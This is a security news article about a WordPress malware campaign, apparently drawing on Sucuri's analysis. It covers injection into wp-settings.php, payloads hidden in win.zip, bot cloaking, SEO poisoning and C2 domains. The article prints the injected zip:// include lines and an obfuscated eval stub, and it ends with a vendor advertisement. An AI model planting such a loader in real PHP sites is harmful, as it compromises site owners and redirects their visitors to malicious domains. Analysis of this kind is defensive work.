Threat Actors Weaponize WordPress Websites to Redirect Visitors to Malicious Websites

Cybersecurity researchers have uncovered a sophisticated malware campaign targeting WordPress websites through an ingenious ZIP archive-based attack mechanism.

The malware, first reported in July 2025, represents a significant evolution in web-based threats, utilizing advanced obfuscation techniques and stealthy persistence methods to redirect unsuspecting visitors to malicious domains while simultaneously conducting search engine optimization poisoning operations.

The attack begins with the compromise of WordPress core files, specifically targeting the critical wp-settings.php component.

Once access is gained, attackers inject malicious code that leverages PHP’s zip:// wrapper functionality to execute hidden payloads.

This approach allows the malware to remain virtually undetected by traditional security scanners, as the malicious code is stored within what appears to be an innocuous ZIP archive file named win.zip.

The malware’s primary objectives extend beyond simple redirection schemes. It orchestrates a comprehensive attack on search engine rankings through unauthorized content injection, sitemap manipulation, and the creation of spam-laden pages designed to boost malicious websites in search results.

The infection demonstrates remarkable sophistication in its ability to differentiate between human visitors and automated bots, ensuring that search engine crawlers encounter benign content while real users are subjected to malicious redirects.

Sucuri analysts identified the malware after investigating persistent redirect issues reported by a client, leading to the discovery of this multi-layered threat.

The researchers noted that the malware employs dynamic Command and Control server selection, with different C2 domains activated based on specific URL patterns accessed by visitors.

ZIP Archive Inclusion Mechanism

The malware’s most innovative feature lies in its exploitation of PHP’s zip:// stream wrapper for code inclusion. The initial payload, injected into wp-settings.php, contains two critical lines that establish the infection framework:-

$h = str_replace('www.', '', $_SERVER['HTTP_HOST']);
include('zip://win.zip#' . $h);

This code extracts the domain name from the HTTP_HOST header and uses it to include a file directly from within the win.zip archive.

The technique bypasses traditional file-based detection methods since the malicious code resides within a compressed container rather than as standalone PHP files.

Upon extraction, the ZIP archive reveals heavily obfuscated PHP code structured as:-

$encode=$b3($string);
$string1=$b2($b4($encode));
echo eval("?>" . $string1);

The malware establishes persistence through environment manipulation, setting extended execution timeouts and implementing anti-bot detection mechanisms.

It dynamically selects from multiple Command and Control servers, including domains such as wditemqy[.]enturbioaj[.]xyz and oqmetrix[.]icercanokt[.]xyz, depending on the requested URL path.

This distributed C2 architecture enhances the malware’s resilience against takedown efforts while enabling targeted content delivery based on visitor behavior patterns.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now